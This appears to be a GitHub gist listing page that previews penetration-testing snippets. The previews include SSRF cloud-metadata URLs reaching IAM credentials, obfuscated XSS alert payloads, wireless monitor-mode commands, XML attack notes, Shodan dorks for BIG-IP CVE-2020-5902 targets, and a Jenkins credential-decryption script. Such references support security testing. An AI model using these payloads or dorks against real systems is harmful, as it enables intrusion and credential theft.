Skip to content

Instantly share code, notes, and snippets.

View kongwenbin's full-sized avatar
💭
I may be slow to respond.

Wen Bin kongwenbin

💭
I may be slow to respond.
4 followers · 0 following
View GitHub Profile
@jhaddix
jhaddix / cloud_metadata.txt
Last active April 25, 2024 11:19 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@tomnomnom
tomnomnom / alert.js
Last active April 23, 2024 20:42
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet

#Wireless Penetration Testing Cheat Sheet

##WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.

@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active January 29, 2024 12:34
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@tuxfight3r
tuxfight3r / jenkins-decrypt.groovy
Created September 23, 2015 11:36
Decrypting Jenkins Password
#To Decrypt Jenkins Password from credentials.xml
#<username>jenkins</username>
#<passphrase>your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J</passphrase>
#go to the jenkins url
http://jenkins-host/script
#In the console paste the script
hashed_pw='your-sercret-hash-S0SKVKUuFfUfrY3UhhUC3J'